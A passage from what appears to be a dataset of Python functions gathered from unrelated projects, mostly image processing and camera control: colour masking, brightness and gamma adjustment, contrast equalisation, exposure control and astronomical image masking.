#center of image\n \n if (center_x == None) & (center_y == None):\n new_center_x, new_center_y = im_center_x,im_center_y\n else:\n new_center_x, new_center_y = center_x,center_y #new \"center\" = location of lens galaxy\n \n \n #distance of each detected peak from center\n R_small = np.sqrt((x_list_small - new_center_x)**2 + (y_list_small - new_center_y)**2) \n R_large = np.sqrt((x_list_large - new_center_x)**2 + (y_list_large - new_center_y)**2)\n \n #Contaminant light is only bright pixels further from center than lens_rad\n x_sats, y_sats = x_list_small[R_small > lens_rad], y_list_small[R_small > lens_rad]\n \n if many_sources:\n x_lens, y_lens = deepcopy(x_list_small), deepcopy(y_list_small)\n else:\n x_lens, y_lens = deepcopy(x_list_large), deepcopy(y_list_large)\n \n# x_lens, y_lens = x_list_small[R_small <= lens_rad], y_list_small[R_small <= lens_rad]\n \n if (len(x_lens) == 0) & (len(y_lens) == 0):\n x_lens = [0,15]\n y_lens = [0,15]\n \n sources = QTable([x_lens, y_lens],names={'x_local_peak','y_local_peak'}) #make table of all detected objects\n# print(x_list_large)\n# print(y_list_large)\n# print(sources)\n \n # show maxima on image for debug\n \n if show_locations:\n# fig = plt.figure(figsize=(4, 4))\n #plt.imshow(image, origin='lower', cmap=cmap_flux, norm=LogNorm(1e-2))\n \n f, axes = plt.subplots(1, 5, figsize=(20,5), sharex=False, sharey=False)\n# plt.figure(figsize = (8,8))\n# plt.subplot(1,2,1)\n \n axes[0].imshow(image, origin='lower', norm=SymLogNorm(5))\n axes[0].set_title('Image')\n axes[0].set_axis_off()\n \n \n axes[1].imshow(LoG, origin='lower', norm=SymLogNorm(5))\n axes[1].set_title('LoG Filtered Image')\n axes[1].set_axis_off()\n\n# plt.subplot(1,2,2)\n axes[2].imshow(filtered, origin='lower', norm=SymLogNorm(5))\n axes[2].set_title('Final Filtered Image')\n axes[2].set_axis_off()\n \n axes[3].imshow(image, origin='lower', norm=SymLogNorm(5))\n for i in range(len(x_lens)):\n axes[3].scatter([x_lens[i]], [y_lens[i]], c='red', s=60, marker='+')\n \n for i in range(len(x_list_large)):\n axes[3].scatter([x_list_large[i]], [y_list_large[i]], c='black', s=100, marker='x')\n axes[3].set_title('Detected Objects')\n axes[3].set_axis_off()\n \n axes[4].imshow(image, origin='lower', norm=SymLogNorm(5))\n \n for i in range(len(x_sats)):\n axes[4].scatter([x_sats[i]], [y_sats[i]], c='red', s=60, marker='+')\n \n# plt.annotate(i+1, (x_list[i], y_list[i]), color='black')\n \n# for i in range(len(x_mask)):\n# plt.scatter([x_mask[i]], [y_mask[i]], c='red', s=100, marker='*')\n# plt.annotate(i+1, (x_mask[i], y_mask[i]), color='red')\n axes[4].scatter(new_center_x, new_center_y,c='red', s=100, marker='*')\n \n draw_lens_circle = Circle((new_center_x, new_center_y),lens_rad ,fill=False)\n draw_gal_circle = Circle((new_center_x, new_center_y),gal_rad, fill = False)\n# plt.gcf().gca().add_artist(draw_lens_circle)\n# plt.gcf().gca().add_artist(draw_gal_circle)\n axes[4].add_patch(draw_lens_circle)\n# axes[4].add_patch(draw_gal_circle)\n \n axes[4].set_title('Pixels to Mask: \\n r = {:.3f}'.format(lens_rad_arcsec))\n axes[4].text(1, 1, \"detected components\", color='red')\n axes[4].set_axis_off()\n \n if title != None:\n f.suptitle(title, fontsize = 15)\n# plt.show()\n \n \n return (x_sats, y_sats), (new_center_x, new_center_y), sources", "def filteringEngine(original, debug=False):\n\n processedImage1 = filterNotInRange(original, LABmin_healthy, LABmax_healthy, cv2.COLOR_BGR2LAB)\n processedImage2 = filterNotInRange(original, LABmin_terrain, LABmax_terrain, cv2.COLOR_BGR2LAB)\n # 
Image containing many FPs\n processedImage3 = filterNotInRange(original, HSVmin_yellow, HSVmax_yellow, cv2.COLOR_BGR2HSV)\n\n sum1 = cv2.add(processedImage1, processedImage2)\n sub1 = differentialNode(original, sum1)\n\n processedImage = filterNotInRange(sub1, LABmin, LABmax, cv2.COLOR_BGR2LAB)\n # sum2 = cv2.add(processedImage, processedImage3)\n\n kernel = np.ones((6, 6), np.uint8)\n temp = closing(processedImage, kernel)\n\n kernel = np.ones((3, 3), np.uint8)\n out = opening(temp, kernel)\n\n if debug:\n cv2.imshow('processedImage1', processedImage1)\n cv2.imshow('processedImage2', processedImage2)\n cv2.imshow('processedImage3', processedImage3)\n cv2.imshow('sum1', sum1)\n cv2.imshow('sub1', sub1)\n cv2.imshow('processedImage', processedImage)\n cv2.imshow('sum2', sum2)\n cv2.imshow('out', out)\n\n return out", "def get_object(img, color,cam='front'):\n if color == \"yellow\":\n if cam == \"front\":\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n lower = np.array([15, 146, 0], dtype=np.uint8)\n upper = np.array([62, 255, 255], dtype=np.uint8)\n mask = cv.inRange(hsv, lower, upper)\n if cam == \"bottom\":\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n lower = np.array([15, 146, 0], dtype=np.uint8)\n upper = np.array([62, 255, 255], dtype=np.uint8)\n mask = cv.inRange(hsv, lower, upper)\n elif color == \"red\":\n if world == \"real\":\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n lower1 = np.array([0, 39, 17], dtype=np.uint8)\n upper1 = np.array([32, 208, 115], dtype=np.uint8)\n lower2 = np.array([122, 39, 17], dtype=np.uint8)\n upper2 = np.array([180, 208, 115], dtype=np.uint8)\n mask1 = cv.inRange(hsv, lower1, upper1)\n mask2 = cv.inRange(hsv, lower2, upper2)\n mask = cv.bitwise_or(mask1, mask2)\n if world == \"sim\":\n hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n lower1 = np.array([0, 85, 12], dtype=np.uint8)\n upper1 = np.array([11, 234, 234], dtype=np.uint8)\n lower2 = np.array([158, 85, 12], dtype=np.uint8)\n upper2 = np.array([180, 234, 234], dtype=np.uint8)\n mask1 = cv.inRange(hsv, lower1, upper1)\n mask2 = cv.inRange(hsv, lower2, upper2)\n mask = cv.bitwise_or(mask1, mask2)\n return mask", "def adjust_brightness(img, brightness_factor):\n _assert_image_tensor(img, 'CHW')\n assert brightness_factor >= 0, \"brightness_factor should be non-negative.\"\n assert _get_image_num_channels(img, 'CHW') in [\n 1,\n 3,\n ], \"channels of input should be either 1 or 3.\"\n\n extreme_target = paddle.zeros_like(img, img.dtype)\n return _blend_images(img, extreme_target, brightness_factor)", "def mouseImage(event, x, y, flags, param):\n \n if event==cv.CV_EVENT_LBUTTONDOWN: #Clicked the left button\n print \"x, y are\", x, y\n (b,g,r) = D.image[y,x]\n print \"r,g,b is\", int(r), int(g), int(b)\n (h,s,v) = D.hsv[y,x]\n print \"h,s,v is\", int(h), int(s), int(v)\n D.down_coord = (x,y)\n D.mouse_down = True\n \n elif event==cv.CV_EVENT_LBUTTONUP: #Let go of the left button\n print \"x, y are\", x, y\n (b,g,r) = D.image[y,x]\n print \"r,g,b is\", int(r), int(g), int(b)\n (h,s,v) = D.hsv[y,x]\n print \"h,s,v is\", int(h), int(s), int(v)\n D.up_coord = (x,y)\n D.mouse_down = False\n\n if D.mode == \"clear\":\n D.sections = []\n else: #Start, add, or subtract -- put lower coordinates first\n x0, y0, x1, y1 = D.down_coord[0], D.down_coord[1], D.up_coord[0], D.up_coord[1]\n\n if x0 > x1:\n x0, x1 = x1, x0\n if y0 > y1:\n y0, y1 = y1, y0\n \n if D.mode == \"start\":\n D.sections = []\n mode_dict = {\"start\":'a', \"add\":'a', \"subtract\":'s'}\n D.sections.append([mode_dict[D.mode], (x0, y0), (x1, y1)])\n 
ImageProcessing.process_section(D)\n\n\n elif event == cv.CV_EVENT_RBUTTONDOWN: #Right click\n D.target_coord = (x, y)\n ImageProcessing.target_coord(D)\n\n\n elif D.mouse_down and event==cv.CV_EVENT_MOUSEMOVE: #Mouse just moved\n D.up_coord = (x,y)", "def __opacity_slider(self, s):\n if len(self.__robots) > 0:\n self.__robots[self.__selected_robot].set_transparency(s.value)", "def testConstantBoundedField(self):\n photoCalib = lsst.afw.image.PhotoCalib(self.constantCalibration)\n self._testPhotoCalibCenter(photoCalib, 0)\n\n self.assertEqual(1, photoCalib.instFluxToMaggies(self.instFlux, self.pointYShift))\n self.assertEqual(0, photoCalib.instFluxToMagnitude(self.instFlux, self.pointYShift))\n self.assertFloatsAlmostEqual(1e-9, photoCalib.instFluxToMaggies(self.instFlux*1e-9, self.pointXShift))\n self.assertFloatsAlmostEqual(22.5, photoCalib.instFluxToMagnitude(\n self.instFlux*1e-9, self.pointXShift))\n\n photoCalib = lsst.afw.image.PhotoCalib(self.constantCalibration, self.calibrationErr)\n self._testPhotoCalibCenter(photoCalib, self.calibrationErr)", "def adjustBrightness(img, fac):\n img2 = np.float32(img) * fac\n img2 = img2.clip(min=0, max=255)\n return np.uint8(img2)", "def runPass(self, exposure_range, rate):\n r = rospy.Rate(rate)\n for i, exposure in enumerate(exposure_range):\n if rospy.is_shutdown():\n break\n\n self.current_exposure = exposure\n self.client.update_configuration(\n {\"exposure\": self.current_exposure})\n r.sleep()\n\n finished = (i >= (len(exposure_range)-1))\n if finished:\n optimal_exposure = max(self.scores, key=self.scores.get)\n self.reset()\n return optimal_exposure # an optimal exposure has been found\n else:\n return -1", "def _normed_jet_exposure_between_bounds(self,\n concentration_model: ConcentrationModel,\n time1: float, time2: float):\n start, stop = self.extract_between_bounds(time1, time2)\n jet_origin = self.expiration.jet_origin_concentration()\n return jet_origin * (stop - start)", "def enhanceContrast(image, mask, target_path, name, save=False):\n \n\n \n # Contrast stretching\n p2, p98 = np.percentile(image, (2, 98))\n image_rescale = exposure.rescale_intensity(image, in_range=(p2, p98))\n \n # Equalization\n image_eq = exposure.equalize_hist(image)\n \n # Adaptive Equalization\n image_adapteq = exposure.equalize_adapthist(image, clip_limit=0.03)\n \n # Display results\n fig = plt.figure(figsize=(19, 13))\n axes = np.zeros((2, 4), dtype=np.object)\n axes[0, 0] = fig.add_subplot(2, 4, 1)\n for i in range(1, 4):\n axes[0, i] = fig.add_subplot(2, 4, 1+i, sharex=axes[0,0], sharey=axes[0,0])\n for i in range(0, 4):\n axes[1, i] = fig.add_subplot(2, 4, 5+i)\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(image, mask, mask_cmap, img_cmap,\n axes[:, 0])\n ax_image.set_title('Low contrast image')\n \n y_min, y_max = ax_hist.get_ylim()\n ax_hist.set_ylabel('Number of pixels')\n ax_hist.set_yticks(np.linspace(0, y_max, 5))\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(image_rescale, mask, mask_cmap, img_cmap,\n axes[:, 1])\n ax_image.set_title('Contrast stretching')\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(image_eq, mask, mask_cmap, img_cmap,\n axes[:, 2])\n ax_image.set_title('Histogram equalization')\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(image_adapteq,mask, mask_cmap, img_cmap,\n axes[:, 3])\n ax_image.set_title('Adaptive equalization')\n \n ax_cdf.set_ylabel('Fraction of total intensity')\n ax_cdf.set_yticks(np.linspace(0, 1, 5))\n \n # prevent overlap of y-axis labels\n fig.tight_layout()\n if save:\n 
plt.savefig(os.path.join(target_path, name))\n else:\n plt.show()\n plt.close()\n return image_adapteq", "def _set_slider_value(self, slider, name):\n val = slider.get_value()\n val /= 127\n # Change brightness, contrast or saturation\n self._manipulations[name] = val\n # Run the manipulation function\n self._apply()", "def expose(self):\n if self.camera is None: # test mode -- immediately return test image\n print(\"NO SPECTRAL CAMERA FOUND -- USING TEST DATA\")\n self.filename = \"example_fits_files/Mooi\"\n return\n\n exposure_time = self.time.get()\n try:\n self.exposure_time = float(exposure_time)\n except:\n message = \"Exposure time \\\"{0}\\\" cannot be converted to floating point number\".format(exposure_time)\n messagebox.showerror(\"Error\", message)\n raise ValueError(message)\n filename = \"spectra/{0}\".format(timestamp())\n self.camera.spectrum(self.exposure_time, filename)\n self.filename = filename", "def gamma_slide(self):\r\n gamma_input = self.horizontal.get() # Get the user input of gamma\r\n img = self.master.images[-1] # Choose the displayed image to perform gamma correcting\r\n hsv_image = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) # Convert the BGR to HSV type\r\n transformed_dim = gamma.gamma_correct(hsv_image[:, :, 2], gamma_input) # Perform gamma correcting on the\r\n # 'V' channel\r\n hsv_image[:, :, 2] = transformed_dim # Set the 'V' channel of the original image as the gamma corrected one\r\n color_image = cv2.cvtColor(hsv_image, cv2.COLOR_HSV2BGR) # Reconvert back the image to BGR\r\n self.master.display_image.display_image(img=color_image) # Display the reconverted image on the screen\r\n self.master.images.append(color_image) # Append the transformed image to the stack\r", "def extract_single_color_range(self, image,hsv,lower,upper):\n mask = cv2.inRange(hsv, lower, upper)\n res = cv2.bitwise_and(image,image, mask= mask)\n\n res = cv2.medianBlur(res, 5)\n return res", "def adjust_brightness(image, mask, gamma):\r\n\r\n\tassert image.shape[:2] == mask.shape and gamma > 0\r\n\r\n\t## to increase the number of channel of the mask to three so that we can apply the masks\r\n\t## to image\r\n\tmasks = np.stack([mask, mask, mask], axis = -1)\r\n\r\n\tscale = float(dtype_limits(image, True)[1] - dtype_limits(image, True)[0])\r\n\r\n\toutput = np.where(masks == 1,\r\n\t\t\t\t\t\t(image / scale) ** (1 / gamma) * scale,\r\n\t\t\t\t\t\timage)\r\n\r\n\t## to make sure the pixel intensity is within the range of uint8\r\n\toutput = np.clip(output, 0, 255).astype(np.uint8)\r\n\r\n\treturn output", "def change_brightness_conv(image, value):\n image = rescale_image_0255(image)\n image = change_brightness(image, value)\n return rescale_image_01(image)", "def refocus(opt_model):\n osp = opt_model['optical_spec']\n\n fld = osp['fov'].fields[0] # assumed to be the axial field\n wvl = osp['wvls'].central_wvl\n\n df_ray, ray_op, wvl = trace_safe(opt_model, [0., 1.], fld, wvl, \n output_filter=None, rayerr_filter='full', \n use_named_tuples=True)\n\n defocus = -df_ray[-1].p[1]/(df_ray[-2].d[1]/df_ray[-2].d[2])\n\n return defocus", "def pre_processing_image(img):\n\n #print(img.shape)\n # apply gamma correction and show the images\n #adjusted = adjust_gamma(img, gamma=0.65)\n\n adjusted = exposure.adjust_gamma(img, gamma=1.65)\n #print(adjusted.shape)\n\n # log transform of image\n\n logarithmic_corrected = exposure.adjust_log(adjusted, 1)\n #print(logarithmic_corrected.shape)\n\n # denoising\n #dst2 = cv2.fastNlMeansDenoisingColored(logarithmic_corrected, None, 10, 10, 7, 21)\n 
#print(dst2.shape)\n dst2 = logarithmic_corrected\n return dst2", "def _hold_bounds(self):\n adc_channel = self.graph_renderer.channels[0]\n if self.sx2 > adc_channel.size():\n self.anchored = True\n\n if self.anchored:\n # anchor right side of the window to the last graph sample. so the graph always animates, grows out from\n # the right side of the window. (anchor sx2 to adc_channel.size())\n dx = self.sx2 - adc_channel.size()\n dxw = self.wsx2 - adc_channel.size()\n self.sx1 -= dx\n self.sx2 -= dx\n self.wsx1 -= dxw\n self.wsx2 -= dxw\n\n # eliminate integer overflow problems. only allow indices smaller than a 32bit integer value. and then divide\n # it by four just to be sure.. maybe it's not necessary, but maybe there are some other tricks used in the\n # graph rendering..\n bound = 0xffffffff / 4\n # hmm. this allows only 12 days of data with ~960Hz. time to go 64bit?\n self.sx1 = max(self.sx1, -bound)\n self.sy1 = max(self.sy1, -bound)\n self.sx1 = min(self.sx1, bound)\n self.sy1 = min(self.sy1, bound)\n self.sx2 = max(self.sx2, -bound)\n self.sy2 = max(self.sy2, -bound)\n self.sx2 = min(self.sx2, bound)\n self.sy2 = min(self.sy2, bound)\n self.wsx1 = max(self.wsx1, -bound)\n self.wsy1 = max(self.wsy1, -bound)\n self.wsx1 = min(self.wsx1, bound)\n self.wsy1 = min(self.wsy1, bound)\n self.wsx2 = max(self.wsx2, -bound)\n self.wsy2 = max(self.wsy2, -bound)\n self.wsx2 = min(self.wsx2, bound)\n self.wsy2 = min(self.wsy2, bound)\n\n # limit horizontal zoom to 2 samples. can't zoom in anymore if less than one sample stays on screen.\n # don't have time to implement and test line segment cutting, if one sample is outside the window, and another\n # is inside.\n if self.wsx2 - self.wsx1 < 2.:\n self.wsx2 = self.wsx1 + 2.\n if self.sx2 - self.sx1 < 2.:\n self.sx2 = self.sx1 + 2.\n\n #\n # limit vertical movement and vertical zoom\n #\n\n val_min = adc_channel.value_min\n val_max = adc_channel.value_max\n\n # allow offset of this percent/100 of the screen\n overlap = .30\n\n # top of the screen has smaller sample values than bottom of the screen. inverted graph.\n # sy1 is top pixel, sy2 bottom. 
bottom-left coordinat is (0, 0)\n if self.sy1 < self.sy2:\n val_top = val_min + (self.wsy1 - self.wsy2) * overlap\n val_bottom = val_max - (self.wsy1 - self.wsy2) * overlap\n if self.wsy1 < val_top:\n self.wsy2 -= self.wsy1 - val_top\n self.wsy1 = val_top\n if self.wsy2 > val_bottom:\n self.wsy1 += val_bottom - self.wsy2\n self.wsy2 = val_bottom\n if self.wsy1 < val_top:\n self.wsy1 = val_top\n if self.wsy2 > val_bottom:\n self.wsy2 = val_bottom\n else:\n val_bottom = val_min - (self.wsy1 - self.wsy2) * overlap\n val_top = val_max + (self.wsy1 - self.wsy2) * overlap\n if self.wsy1 > val_top:\n self.wsy2 -= self.wsy1 - val_top\n self.wsy1 = val_top\n if self.wsy2 < val_bottom:\n self.wsy1 += val_bottom - self.wsy2\n self.wsy2 = val_bottom\n if self.wsy1 > val_top:\n self.wsy1 = val_top\n if self.wsy2 < val_bottom:\n self.wsy2 = val_bottom", "def guider(x=0,y=0):\n if x==0 and y==0 and (gzero.gxoff<>0 or gzero.gyoff<>0):\n opticalcoupler.HomeXYStage()\n opticalcoupler.MoveXYStage( x=(x+gzero.gxoff), y=(y+gzero.gyoff) )\n camera.status.guider = (x,y)", "def camera(self):\n self.spectrum = self.spectrum", "def run_calib(projector=OPTOMA_HD33()):\n w, h = (0.2160, 0.2794)\n obj_points = np.array([[-w/2, h/2, 0], [w/2, h/2, 0],\n [-w/2, 0, 0], [w/2, 0, 0],\n [-w/2, 0, h/2], [w/2, 0, h/2]])\n\n global img_points, going\n img_points = []\n\n try:\n window = Window()\n window.MoveXY(1600,0)\n window.ShowFullScreen(True)\n going = True\n\n @window.eventx\n def EVT_MOUSE_EVENTS(evt):\n global going, img_points\n if evt.ButtonUp(wx.MOUSE_BTN_LEFT):\n img_points.append(evt.Position)\n print('Picked point %d of 6' % (len(img_points)))\n if len(img_points) == len(obj_points):\n print \"Done\"\n going = False\n\n print(\"\"\"[Extrinsic Calibration] \n\nThere should be 6 points marked on the table and backdrop. \nMoving the mouse over the projected display, click each of the points\nin order:\n (left top, on the backdrop),\n (right top, on the backdrop),\n (left center, on the crease),\n (right center, on the crease),\n (left bottom, on the table),\n (right bottom, on the table)\n\nFollow along with this illustration: http://imgur.com/asfsfd.jpg\n\nClick the six points:\n\"\"\")\n\n while going: cv.WaitKey(10)\n\n finally:\n window.Close()\n\n img_points = np.array(img_points, 'f')\n projector.calibrate_extrinsic(img_points, obj_points)\n\n np.save('%s/config/projector' % (newest_folder), (projector.KK, projector.RT))\n print('OK')", "def blur_released(self, event):\r\n if self.winfo_containing(event.x_root, event.y_root) == self.blur_button: # If clicked area has the blur button\r\n if self.image_present_check(): # Check if there is a displayed image else throw an error box\r\n self.horizontal = Scale(self, from_=0.00, to=100.00, resolution = 0.5, orient=HORIZONTAL) # Invoke a \r\n # slider to take the user input for standard deviation\r\n self.horizontal.pack() # Pack it onto GUI screen\r\n blur_button = Button(self, text=\"Set STD of Gaussian Window\", command=self.blur_slide).pack() # Button \r\n # for the user to input their chosen value. When the user clicks it blur_slide function is called\r", "def adjust_brightness(img, brightness_factor):\n if not _is_numpy_image(img):\n raise TypeError('img should be CV Image. 
Got {}'.format(type(img)))\n\n im = img.astype(np.float32) * brightness_factor\n im = im.clip(min=0, max=255)\n return im.astype(img.dtype)", "def exposure(frameType, expTime):\n\n blobEvent.clear() \n\n # set the specified frame type\n if frameType.lower() == 'light':\n ccd_frame[0].s = PyIndi.ISS_ON\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n elif frameType.lower() == 'bias':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_ON\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n elif frameType.lower() == 'dark':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_ON\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n elif frameType.lower() == 'flat':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_ON \n indiclient.sendNewSwitch(ccd_frame)\n\n # set the value for the next exposure\n ccd_exposure[0].value=expTime\n\n indiclient.sendNewNumber(ccd_exposure)\n\n # wait for the exposure\n blobEvent.wait()\n\n for blob in ccd_ccd1:\n # pyindi-client adds a getblobdata() method to IBLOB item\n # for accessing the contents of the blob, which is a bytearray in Python\n image_data=blob.getblobdata()\n\n # write the byte array out to a FITS file\n global imgNum\n global imgName\n imgNum += 1\n fileName = fileDir+'raw-'+str(imgNum).zfill(8)+'.fits'\n f = open(fileName, 'wb')\n f.write(image_data)\n f.close()\n imgName = fileName\n \n return fileName", "def resize_frame(event,x,y,flags,param):\t\t\n global upperPt, lowerPt, frame\n if event == cv2.EVENT_LBUTTONDOWN:\n upperPt = [(x,y)]\n print upperPt\n if event == cv2.EVENT_LBUTTONUP:\n lowerPt = [(x,y)]\n print lowerPt\n cv2.rectangle(frame, upperPt[0], lowerPt[0],(0,0,0),1)\n cv2.destroyWindow('Select region of interest')\t\t\t\n #crop frame\n frame = frame[upperPt[0][1]:lowerPt[0][1],upperPt[0][0]:lowerPt[0][0]]\n cv2.imwrite('resized.jpg',frame)\n frame = histNorm(frame)\n print('Resize successful')\n cv2.imshow('Select region of interest', frame)\t\n\n color_data[\"upperPt\"] = upperPt\n color_data[\"lowerPt\"] = lowerPt", "def closed_zone(self, tissue):\n img_cv2_mask = self.pressure_img.mask\n self.pressure_img.roi_crop(img_cv2_mask, tissue)", "def Focus_beam(Collimated_Pupil, pad_width = 0):\n\n Collimated_Pupil_padded = np.pad(Collimated_Pupil,pad_width=int(pad_width),mode='constant') \n\n f = np.fft.fft2(Collimated_Pupil_padded) #must be complex amplitude going in here\n fshift = np.fft.fftshift(f)\n intensity_image = (np.abs(fshift))**2\n \n return intensity_image", "def exercise2b(self):\n self.b2 = calibrate_image(self.b1)\n plt.axis('off')\n plt.imshow(self.b2)\n plt.show()\n misc.imsave(\"B2.png\", self.b2)\n misc.imsave(\"B2_Brightness.png\", print_brightness(self.b2))", "def __init__(self, lf, width= None, height= None, sensitivity=2):\n super().__init__(size=(width, height))\n \n # Adjustable dimensions of the canvas and mouse sensitivity\n self.width = width or lf.shape[-2]\n self.height = height or lf.shape[-3]\n self.dim = lf.ndim\n self.sensitivity = sensitivity\n self.display_image = IpyImage()\n out_width = width//2\n out_height = 3*height//(4)\n slider_height = height - out_height\n self.out = Output(layout={'border': '1px solid black', 'width': f'{out_width}px', 'height': f'{out_height}px'})\n \n # Prepare 
the lightfields to be rendered with the self.draw function()\n self.lf = self.convert_lf(lf)\n self.downsampled_lf = self.downsample_lf(self.lf)\n \n if self.dim == 6:\n self.u_min, self.u_max = 0, self.lf.shape[1]-1\n self.v_min, self.v_max = 0, self.lf.shape[2]-1\n self.z_min, self.z_max = 0, self.lf.shape[0]-1\n elif self.dim == 5:\n self.u_min, self.u_max = 0, self.lf.shape[0]-1\n self.v_min, self.v_max = 0, self.lf.shape[1]-1\n self.z_min, self.z_max = 0, 0\n elif self.dim == 4:\n self.u_min, self.u_max = 0, 0\n self.v_min, self.v_max = 0, 0\n self.z_min, self.z_max = 0, self.lf.shape[0]-1\n else:\n raise Exception(\"unexpected number of dimensions for lightfield\")\n \n self.slider = IntSlider(min=0, max=self.z_max, value=0, description= 'Z',\n layout={'width': '', 'height': f'{slider_height}px',\n 'flex-flow': 'column', 'align-self': 'left'})\n self.slider.observe(self.handle_zoom_change, names='value')\n\n self.dragging = False\n self.x_mouse = None\n self.y_mouse = None\n \n self.u_idx = self.u_max//2\n self.v_idx = self.v_max//2\n self.z_idx = 0\n \n #Initialize state\n self.draw()\n \n self.on_mouse_down(self.mouse_down_handler)\n self.on_mouse_move(self.mouse_move_handler)\n self.on_mouse_up(self.mouse_up_handler)\n self.on_mouse_out(self.mouse_out_handler)", "def adaptiveContrast(image, mask, target_path, name, kernel_sizes, save=False):\n\n transforms = []\n for kernel_size in kernel_sizes:\n image_adapteq = exposure.equalize_adapthist(image, kernel_size=kernel_size, clip_limit=0.03)\n transforms.append(image_adapteq)\n \n # Display results\n fig = plt.figure(figsize=(19, 16))\n axes = np.zeros((2, 5), dtype=np.object)\n axes[0, 0] = fig.add_subplot(2, 5, 1)\n for i in range(1, 5):\n axes[0, i] = fig.add_subplot(2, 5, 1+i, sharex=axes[0,0], sharey=axes[0,0])\n for i in range(0, 5):\n axes[1, i] = fig.add_subplot(2, 5, 6+i)\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(transforms[0], mask, mask_cmap, img_cmap,\n axes[:, 0])\n ax_image.set_title('%d' %kernel_sizes[0])\n \n y_min, y_max = ax_hist.get_ylim()\n ax_hist.set_ylabel('Number of pixels')\n ax_hist.set_yticks(np.linspace(0, y_max, 5))\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(transforms[1], mask, mask_cmap, img_cmap,\n axes[:, 1])\n ax_image.set_title('%d' %kernel_sizes[1])\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(transforms[2], mask, mask_cmap, img_cmap,\n axes[:, 2])\n ax_image.set_title('%d' %kernel_sizes[2])\n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(transforms[3],mask, mask_cmap, img_cmap,\n axes[:, 3])\n ax_image.set_title('%d' %kernel_sizes[3])\n \n \n ax_image, ax_hist, ax_cdf = plot_image_and_hist(transforms[4],mask, mask_cmap, img_cmap,\n axes[:, 4])\n ax_image.set_title('%d' %kernel_sizes[4])\n \n ax_cdf.set_ylabel('Fraction of total intensity')\n ax_cdf.set_yticks(np.linspace(0, 1, 5))\n \n # prevent overlap of y-axis labels\n fig.tight_layout()\n if save:\n plt.savefig(os.path.join(target_path, name))\n else:\n plt.show()\n plt.close()\n\n return image_adapteq", "def focus(self, smooth=0):\n if self.image is None:\n self.load_image()\n # image = self.load_image()\n # print self.image\n if not self.bw:\n gray = rgb_2_gray(self.image)\n else:\n gray = self.image\n sx = ndimage.filters.sobel(gray, axis=0, mode='constant')\n sy = ndimage.filters.sobel(gray, axis=1, mode='constant')\n sob = np.hypot(sx, sy)\n self.image = None\n self.sob = sob\n if smooth > 0:\n sob = ndimage.filters.gaussian_filter(sob, sigma=smooth)\n return sob", "def autoExposure(this, 
**kargs):\n\t\t\n\t\t# Arguments\n\t\tframes = kargs.get('frames', 4)\n\t\tstart = kargs.get('start', -10)\n\t\tend = kargs.get('start', -3)\n\t\t\n\t\tmax = 0\n\t\tv = start\n\t\tprint 'Auto Exposition starting...'\n\t\t\n\t\tfor i in range(start, end):\n\t\t\tthis.setProp('exposure', i)\n\t\t\tfor j in range(frames): this.getFrame()\n\t\t\t\n\t\t\te = imEntropy(this.frame)\n\t\t\tif e > max:\n\t\t\t\tmax = e\n\t\t\t\tv = i\n\t\t\n\t\tthis.setProp('exposure', v)\n\t\tfor j in range(frames): this.getFrame()\n\t\tprint 'Exposure Calibrated: %i / Entropy: %.4f' % (v, max)", "def broaden_mask(img, threshold=0.05, qual=None):\n if not np.any(qual):\n qual = DerivativeVariance(img.phase)\n qual = qual[img.mask==True].max()*1.1 - qual\n max_value = qual[img.mask==True].max()\n img['mask'][qual<max_value*threshold] = False", "def windowing(im, win):\n im1 = im.astype(float)\n im1 -= win[0]\n im1 /= win[1] - win[0]\n im1[im1 > 1] = 1\n im1[im1 < 0] = 0\n im1 *= 255\n return im1", "def adjust_brightness(brightness_factor: float) -> Callable:\n return lambda img: TF.adjust_brightness(img, brightness_factor)", "def apply_camshift(roi_box, termination, roi_hist):\n global frame, roi_points, input_mode\n\n # calculate back projection for the ROI\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n back_projection = cv2.calcBackProject([hsv], [0], roi_hist, [0, 180], 1)\n\n # apply the camshift algorithm to the ROI\n r, roi_box = cv2.CamShift(back_projection, roi_box, termination)\n points = np.int0(cv2.boxPoints(r))\n cv2.polylines(frame, [points], True, (0, 255, 0), 2)", "def filterNotInRange(frame, min, max, colorMode):\n\n tempFrame = cv2.cvtColor(frame, colorMode)\n\n mask = cv2.inRange(tempFrame, min, max)\n\n filtered_frame = cv2.bitwise_and(frame, frame, mask=mask)\n\n return filtered_frame", "def _long_range_normed_exposure_between_bounds(self, time1: float, time2: float) -> _VectorisedFloat:\n exposure = 0.\n for start, stop in self.exposed.presence_interval().boundaries():\n if stop < time1:\n continue\n elif start > time2:\n break\n elif start <= time1 and time2<= stop:\n exposure += self.concentration_model.normed_integrated_concentration(time1, time2)\n elif start <= time1 and stop < time2:\n exposure += self.concentration_model.normed_integrated_concentration(time1, stop)\n elif time1 < start and time2 <= stop:\n exposure += self.concentration_model.normed_integrated_concentration(start, time2)\n elif time1 <= start and stop < time2:\n exposure += self.concentration_model.normed_integrated_concentration(start, stop)\n return exposure", "def clamp(self):\n 